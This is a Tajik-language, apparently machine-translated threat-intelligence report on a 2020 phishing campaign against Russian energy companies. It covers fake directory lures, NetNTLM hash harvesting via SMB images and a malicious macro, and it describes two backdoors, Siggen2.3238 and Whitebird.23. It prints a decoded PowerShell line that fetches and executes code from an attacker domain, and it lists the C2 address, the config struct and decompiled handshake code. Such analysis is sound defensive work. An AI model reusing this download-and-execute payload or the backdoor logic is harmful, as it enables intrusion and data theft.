Таҷрибаи мо дар таҳқиқи ҳодисаҳои амнияти компютерӣ нишон медиҳад, ки почтаи электронӣ то ҳол яке аз каналҳои маъмултаринест, ки ҳамлагарон барои ворид шудан ба инфрасохтори шабакаи ҳамлашуда истифода мебаранд. Як амали беэҳтиётӣ бо ҳарфи шубҳанок (ё на он қадар шубҳанок) нуқтаи воридшавӣ барои сирояти минбаъда мегардад, аз ин рӯ киберҷинояткорон усулҳои муҳандисии иҷтимоиро, ҳарчанд бо дараҷаҳои гуногуни муваффақият фаъолона истифода мебаранд.
Дар ин паём мо мехоҳем дар бораи таҳқиқи ахири худ дар бораи як маъракаи спам, ки ба як қатор корхонаҳои комплекси сӯзишворию энергетикии Русия нигаронида шудааст, сӯҳбат кунем. Ҳама ҳамлаҳо аз рӯи як сенария бо истифода аз мактубҳои қалбакӣ сурат гирифтанд ва ба назар чунин менамуд, ки ҳеҷ кас барои мундариҷаи матни ин мактубҳо кӯшиши зиёд сарф накардааст.
Хадамоти иктишофӣ
Ҳамааш дар охири моҳи апрели соли 2020 оғоз шуд, вақте таҳлилгарони вируси Doctor Web маъракаи спамро ошкор карданд, ки дар он ҳакерҳо феҳристи телефонии навшударо ба кормандони як қатор корхонаҳои маҷмааи сӯзишворӣ ва энергетикии Русия фиристодаанд. Албатта, ин як намоиши оддии нигаронӣ набуд, зеро директория воқеӣ набуд ва ҳуҷҷатҳои .docx ду тасвирро аз захираҳои дурдаст зеркашӣ карданд.
Яке аз онҳо аз сервери news[.]zannews[.]com ба компютери корбар бор карда шудааст. Қобили зикр аст, ки номи домен ба домени маркази расонаии зидди фасоди Қазоқистон - zannews[.]kz шабоҳат дорад. Аз тарафи дигар, домени истифодашуда дарҳол як маъракаи дигари соли 2015-ро ба ёд меовард, ки бо номи TOPNEWS маъруф буд, ки пушти дари ICEFOG-ро истифода мебурд ва доменҳои назорати троянӣ бо зерсатри “Ахбор” дар номашон буд. Хусусияти дигари ҷолиб ин буд, ки ҳангоми фиристодани паёмҳои электронӣ ба гирандагони гуногун, дархостҳо барои зеркашии тасвир ё параметрҳои дархости гуногун ё номҳои беназири тасвирро истифода мебурданд.
Мо боварӣ дорем, ки ин бо мақсади ҷамъоварии маълумот барои муайян кардани мухотиби "эътимоднок" анҷом дода шудааст, ки пас аз он кафолат дода мешавад, ки мактубро дар вақти лозима кушояд. Протоколи SMB барои зеркашии тасвир аз сервери дуюм истифода мешуд, ки онро метавон барои ҷамъоварии хэшҳои NetNTLM аз компютерҳои кормандоне, ки ҳуҷҷати қабулшударо кушоданд, анҷом дод.
Ва инак худи мактуб бо феҳристи қалбакӣ:
Моҳи июни соли ҷорӣ ҳакерҳо барои бор кардани тасвирҳо аз номи домени нав, sports[.]manhajnews[.]com истифода бурданд. Таҳлил нишон дод, ки зердоменҳои manhajnews[.]com аз ҳадди ақал аз моҳи сентябри соли 2019 дар паёмҳои спам истифода мешаванд. Яке аз ҳадафҳои ин маърака як донишгоҳи бузурги Русия буд.
Инчунин, то моҳи июн, созмондиҳандагони ҳамла барои мактубҳои худ матни навро таҳия карданд: ин дафъа дар ҳуҷҷат маълумот дар бораи рушди саноат мавҷуд аст. Дар матни нома ба таври возеҳ нишон дода шудааст, ки муаллифи он ё зодаи забони русӣ нест ва ё дидаву дониста дар бораи худ чунин таассурот эҷод мекунад. Мутаассифона, идеяҳои рушди саноат, чун ҳамеша, танҳо як муқова буданд - ҳуҷҷат боз ду тасвирро зеркашӣ кард, дар ҳоле ки сервер ба зеркашии[.]inklingpaper[.]com иваз карда шуд.
Навоварии навбатӣ дар моҳи июл пайдо шуд. Дар кӯшиши канорагирӣ аз ошкор кардани ҳуҷҷатҳои зараровар тавассути барномаҳои антивирус, ҳамлагарон ба истифодаи ҳуҷҷатҳои Microsoft Word, ки бо парол рамзгузорӣ шудаанд, оғоз карданд. Ҳамзамон, ҳамлагарон тасмим гирифтанд, ки як техникаи классикии муҳандисии иҷтимоӣ - огоҳии мукофотро истифода баранд.
Матни мурочиатнома боз бо хамин услуб навишта шуда буд, ки дар байни мухотаб шубхаи иловагй ба амал овард. Сервер барои зеркашии тасвир низ тағир наёфтааст.
Дар хотир доред, ки дар ҳама ҳолатҳо қуттиҳои почтаи электронии ба қайд гирифташуда дар доменҳои mail[.]ru ва yandex[.]ru барои фиристодани мактубҳо истифода мешуданд.
Атака
То аввали сентябри соли 2020 вақти амал кардан фаро расид. Таҳлилгарони вируси мо мавҷи нави ҳамлаҳоро сабт карданд, ки дар он ҳамлагарон бо баҳонаи навсозии феҳристи телефонҳо боз мактуб фиристоданд. Аммо, ин дафъа замима макроси зарароварро дар бар мегирад.
Ҳангоми кушодани ҳуҷҷати замимашуда, макрос ду файл эҷод мекунад:
- Скрипти VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, ки барои оғози файли партия пешбинӣ шуда буд;
- Худи файли партияи %APPDATA%configstest.bat, ки печида буд.
Моҳияти кори он аз ба кор андохтани қабати Powershell бо параметрҳои муайян вобаста аст. Параметрҳое, ки ба ҷабҳа интиқол дода мешаванд, ба фармонҳо рамзкушо карда мешаванд:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Тавре ки аз фармонҳои пешниҳодшуда бармеояд, домене, ки аз он боркаш зеркашӣ карда мешавад, боз ҳамчун сайти хабарӣ пинҳон карда мешавад. Содда , ки ягона вазифаи онҳо аз сервери фармон ва идоракунӣ гирифтани коди shell ва иҷро кардани он мебошад. Мо тавонистем ду намуди пушти дарҳоро муайян кунем, ки онҳоро дар компютери ҷабрдида насб кардан мумкин аст.
BackDoor.Siggen2.3238
Аввалин аст BackDoor.Siggen2.3238 — мутахассисони мо қаблан дучор нашуда буданд ва аз ҷониби дигар фурӯшандагони антивирус низ дар бораи ин барнома зикр нашудаанд.
Ин барнома як пушти дари дар C++ навишта шуда, дар системаҳои оператсионии 32-битии Windows кор мекунад.
BackDoor.Siggen2.3238 бо истифода аз ду протокол: HTTP ва HTTPS қодир аст бо сервери идоракунӣ муошират кунад. Намунаи санҷидашуда протоколи HTTPS-ро истифода мебарад. Дар дархостҳо ба сервер агенти зерин истифода мешавад:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Дар ин ҳолат, ҳама дархостҳо бо маҷмӯи параметрҳои зерин таъмин карда мешаванд:
%s;type=%s;length=%s;realdata=%send
ки дар он ҳар як сатри %s мувофиқан бо: иваз карда мешавад:
- ID-и компютери сироятшуда,
- навъи дархосте, ки фиристода мешавад,
- дарозии маълумот дар соҳаи воқеӣ,
- маълумот.
Дар марҳилаи ҷамъоварии маълумот дар бораи системаи сироятшуда, пушти дари хати монанди:
lan=%s;cmpname=%s;username=%s;version=%s;
ки дар он lan суроғаи IP-и компютери сироятшуда, cmpname номи компютер, номи корбар номи корбар, версия сатри 0.0.4.03 мебошад.
Ин маълумот бо идентификатори sysinfo тавассути дархости POST ба сервери назорати воқеъ дар https[:]//31.214[.]157.14/log.txt фиристода мешавад. Агар дар чавоб BackDoor.Siggen2.3238 сигнали ДИЛИ-ро кабул мекунад, пайвастшавй бомуваффакият хисоб карда мешавад ва акибдор давраи асосии муоширатро бо сервер огоз мекунад.
Тавсифи пурраи принсипҳои фаъолият BackDoor.Siggen2.3238 дар мост .
BackDoor.Whitebird.23
Барномаи дуюм як модификацияи пушти дарвозаи BackDoor.Whitebird мебошад, ки аллакай аз ҳодисаи як муассисаи давлатии Қазоқистон ба мо маълум аст. Ин версия дар C++ навишта шудааст ва барои кор дар системаҳои оператсионии 32-бит ва 64-бити Windows тарҳрезӣ шудааст.
Мисли аксари барномаҳои ин навъи, BackDoor.Whitebird.23 барои таъсиси пайвасти рамзгузоришуда бо сервери идоракунӣ ва назорати беиҷозати компютери сироятшуда пешбинӣ шудааст. Ба системаи осебдида бо истифода аз қатра насб карда шудааст .
Намунае, ки мо тафтиш кардем, китобхонаи зараровар бо ду содирот буд:
- Google Play
- Санҷиш.
Дар оғози кори худ, он конфигуратсияеро, ки ба корпуси пушти дари сахт пайваст карда шудааст, бо истифода аз алгоритме, ки ба амалиёти XOR бо байт 0x99 асос ёфтааст, рамзкушо мекунад. Конфигуратсия чунин ба назар мерасад:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Барои таъмини кори доимии он, пушти дарвоза арзиши дар майдон нишондодашударо тағир медиҳад соати корй конфигуратсияҳо. Майдон дорои 1440 байт аст, ки арзишҳои 0 ё 1-ро мегиранд ва ҳар дақиқаи ҳар соати рӯзро ифода мекунанд. Барои ҳар як интерфейси шабака риштаи алоҳида эҷод мекунад, ки интерфейсро гӯш мекунад ва бастаҳои авторизатсияро дар сервери прокси аз компютери сироятшуда меҷӯяд. Вақте ки чунин баста ошкор карда мешавад, пушти дарвоза маълумотро дар бораи сервери прокси ба рӯйхати худ илова мекунад. Илова бар ин, мавҷудияти прокси тавассути WinAPI тафтиш мекунад Варианти интернетӣ.
Программа дакикаю соати чориро тафтиш карда, онро бо маълумотхои сахро мукоиса мекунад соати корй конфигуратсияҳо. Агар арзиши дақиқаи мувофиқи рӯз сифр набошад, он гоҳ бо сервери идоракунӣ пайваст мешавад.
Таъсиси пайвастшавӣ ба сервер эҷоди пайвастро бо истифода аз протоколи версияи TLS 1.0 байни муштарӣ ва сервер тақлид мекунад. Дар корпуси пушти дари ду буфер мавҷуд аст.
Буфери аввал бастаи TLS 1.0 Client Hello -ро дар бар мегирад.
Буфери дуюм дорои бастаҳои TLS 1.0 Client Key Exchange бо дарозии калиди 0x100 байт, Тағйир додани рамз, Паёми дастфишори рамзӣ мебошад.
Ҳангоми фиристодани бастаи Client Hello, backdoor дар майдони Client Random 4 байт вақти ҷорӣ ва 28 байт маълумоти псевдотасодуфӣ менависад, ки ба таври зерин ҳисоб карда мешавад:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Бастаи қабулшуда ба сервери назорат фиристода мешавад. Ҷавоб (бастаи сервери Hello) тафтиш мекунад:
- мувофиқат бо версияи протоколи TLS 1.0;
- мувофиқати тамғаи вақт (4 байти аввали майдони бастаи маълумотҳои тасодуфӣ), ки муштарӣ муайян кардааст, ба тамғаи вақт, ки сервер муайян кардааст;
- мувофиқати 4 байти аввал пас аз тамғаи вақт дар майдони Маълумоти тасодуфии муштарӣ ва сервер.
Дар сурати мувофиқатҳои муайяншуда, пушти дарвоза бастаи калиди мубодилаи мизоҷро омода мекунад. Барои ин, он калиди ҷамъиятиро дар бастаи мубодилаи мизоҷ, инчунин Encryption IV ва Encryption Data дар бастаи Encrypted Handshake Message тағйир медиҳад.
Пас аз пушти дарвоза бастаро аз сервери фармон ва идора қабул мекунад, тафтиш мекунад, ки версияи протоколи TLS 1.0 аст ва сипас 54 байти дигарро (ҷасади баста) қабул мекунад. Ин танзими пайвастро ба анҷом мерасонад.
Тавсифи пурраи принсипҳои фаъолият BackDoor.Whitebird.23 дар мост .
Хулоса ва хулосаҳо
Таҳлили ҳуҷҷатҳо, нармафзори зараровар ва инфрасохтори истифодашуда ба мо имкон медиҳад, бо итминон бигӯем, ки ҳамларо яке аз гурӯҳҳои APT Чин омода кардааст. Бо дарназардошти функсияҳои пушти дарҳои пушти дарҳои, ки дар компютерҳои қурбониён ҳангоми ҳамлаи муваффақ насб карда мешаванд, сироят, ҳадди аққал, ба дуздии маълумоти махфӣ аз компютерҳои созмонҳои ҳамлашуда оварда мерасонад.
Илова бар ин, як сенарияи хеле эҳтимолӣ насб кардани троянҳои махсус дар серверҳои маҳаллӣ бо функсияи махсус мебошад. Инҳо метавонанд контроллерҳои доменҳо, серверҳои почта, шлюзҳои интернетӣ ва ғайра бошанд. Тавре ки мо дар мисол мебинем , чунин серверҳо бо сабабҳои гуногун барои ҳамлагарон таваҷҷӯҳи хоса доранд.
Манбаъ: will.com